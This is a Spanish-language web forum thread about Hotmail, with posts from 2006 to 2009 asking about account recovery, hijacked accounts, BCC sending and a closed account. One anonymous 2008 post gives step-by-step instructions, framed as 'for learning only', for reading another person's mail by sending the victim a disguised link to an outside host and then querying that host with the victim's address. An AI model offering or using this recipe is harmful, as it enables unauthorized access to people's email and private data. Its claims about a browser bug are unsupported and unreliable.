Webmaster - Hotmail

 
Vista:

Hotmail

Publicado por Frank (1 intervención) el 05/11/2006 17:23:08
Bueno m an llegado algunos mensajes a mi cooreo de hotmail y al abrirlos automaticamente empieza a sonar una cancion (cualkier tema) alguien sabe como puedo hacer eso osea madar mensajes a hotmail pero con musica de fondo...........???
Valora esta pregunta
Me gusta: Está pregunta es útil y esta claraNo me gusta: Está pregunta no esta clara o no es útil
0
Responder

Hotmail

Publicado por andres (1 intervención) el 24/11/2006 19:06:35
necesito ayuda, necesito saber si hay alguna manera o algun programa de encontrar contraseñas sin saber la pregunta secreta ya que estoy entre la espada y la pared por que necesito recuperar informacion de mi correo el cual se metieron maliciosamente y me cambiaron la contraseña, por favor si saben de algo no duden en enviarmelo a mi correo plis... ya que es de vida o muerte...

atte andres contreras

P.D: este es mi correo [email protected]
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

POR FA NECESITO SU AYUDA,,,ES URGENTEEE

Publicado por stephanny salas villarreal (1 intervención) el 02/08/2007 02:58:45
me dirijo a uds esperando me colaboren en lo posible, ya que un sujeto se infiltro en mi anterior msn el cual era [email protected] y cambio mi pregunta secreta al igual que mi contraseña del correo mencionado, quisiera que sacaran dicho correo de la base de datos ya que en el llegan correos importante de mi universidad y de mi trabajo, no quiero que dicho sujeto atente contra mis contactos usando mi nombre ademas de eso en ese correo ahy datos y direcciones de mi familia y no quiero ponerla en peligro ya que es muy delicado el hecho de que mi correo este en manos de ese loco, le agradesco su total colaboracion y su pronta respuesta a mi otro correo [email protected] gracias,Stephanny Salas.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Hotmail

Publicado por Anonimo (1 intervención) el 16/10/2008 01:17:02
Nueva manera de ver el correo de otra persona.

Este mensaje es solo para aprendizaje, es cierto que hotmail es casi impenetrable, pero, internet explorer y cualquier otro navegador tienen este bug, que debe ser casi imposible de actualizar.

siguiendo estos pasos puedes tener acceso a los mensajes de cualquier cuenta de hotmail.

1.- envia un mensaje al usuario con el siguiente link
http://www12.asphost4free.com/frasescelebres/intermediateAccion.asp?pagina=AQUIPAGINA
NOTA: este link puede ser oculto: <a href= 'http://www12.asphost4free.com/frasescelebres/intermediateAccion.asp?pagina=AQUIPAGINA'>ver video</a>

AQUIPAGINA=una pagina que se abrira cuando el usuario de click

2.- Espera a que el usuario abre tu correo y pulse en el link enviado.

3.- Entra a esta pagina: http://www12.asphost4free.com/frasescelebres/[email protected]

USUARIO=Correo del usuario que deceas ver

4.- Listo.

Aparecera una demostracion de los ultimos correos del usuario.

Nota. Este proceso es solo de informacion, para que esten enterados de que el intener sigue siendo inseguro.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Hotmail

Publicado por Mariana Chruszczyk (1 intervención) el 26/10/2008 18:20:32
Quiero volver al sistema basico de hot mail y en opciones al abrir el correo no me permite seguir, este nuevo sistema no me resulta, no puedo enviar mails con cco, no tengo la lista de contactos a la derecha y podia enviar la cantidad de mails que deseaba y ahora no. Muchas gracias.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Hotmail

Publicado por helito (1 intervención) el 25/02/2009 14:35:46
hola tengo una duda espero alguien pueda ayudarme...QUIERO SABER COMO AL ENVIAR UN CORREO A VARIOS DESTINATARIOS COMO HAGO PARA QUE NO SE VEAN LAS CUENTAS DE CORREO A LAS CUALES LES ENVIO NO SE SI ME EXPLICO.... UNO DE LOS DESTINATARIOS ABRE EL CORREO... YO QUIERO QUE EL NO VEA A QUIEN MAS APARTE DE EL SE LO HE ENVIADO.. SI ALGUIEN PUEDE AYUDARME.. POR FAVOR..... GRAXX. ESPERO RESPUESTA
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Hotmail

Publicado por rocio (1 intervención) el 16/04/2009 17:37:16
POR FAVOR A VER SI ME PODEIS AYUDAR, ME HAN CERRADO LA CUENTA DE HOTMAIL COMO PUEDO ABRIRLA EL MENSAJE QUE ME SALE CUANDO ABRO MI CUENTA ES EL SIGUIENTE:
Esta cuenta se ha cerrado

La cuenta se ha cerrado porque parece que ha infringido las Condiciones de uso. Para volver a abrirla, sigue estos pasos:

1. Haz clic en el siguiente vínculo y rellena el formulario de soporte por correo electrónico.

2. En el cuadro "Selecciona una opción", elige Problema de conexión o inicio de sesión.

3. Aparecerá otro cuadro llamado también "Selecciona una opción". Elige Cuenta cerrada. Acceso denegado.

4. Asegúrate de que respondes a todas las preguntas que tienen una estrella roja (*) al lado. A continuación, haz clic en Enviar.


Revisaremos tu consulta y te responderemos en 24 horas. NO envíes varios formularios, pues esto retrasaría el tiempo de respuesta.

PERO ES QUE NO SE CUAL ES EL VINCULO PARA RELLENAR EL FORMULARIO
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

INSCRIPCION DE LA V VALIDA EN CORO

Publicado por JOSE RAMOS (1 intervención) el 19/05/2009 22:16:03
ANTE TODO UN CORDIAL SALUDO.
EL DEPOSITO FUE HECHO EN EL BANCO DE VENEZUELA.
NUM.DE DEPOSITO: 17527198.
MONTO:300BsF.
A NOMBRE DE LA COMISION NACIONAL DE ENDURO.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

Un correo eliminado

Publicado por Ismael (1 intervención) el 11/09/2009 12:33:03
Hola hace tiempo borre un mensaje k era d guerrerosporlapaz(gplp) dond me mandaban mi cuenta y contraseña pero resulta k lo borre sin kerer venia con una ! roja d urgente.En el mensaje sal mi cuenta y contraseña. Me pueden volver a enviar ese mensaje porfa.Gracias.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar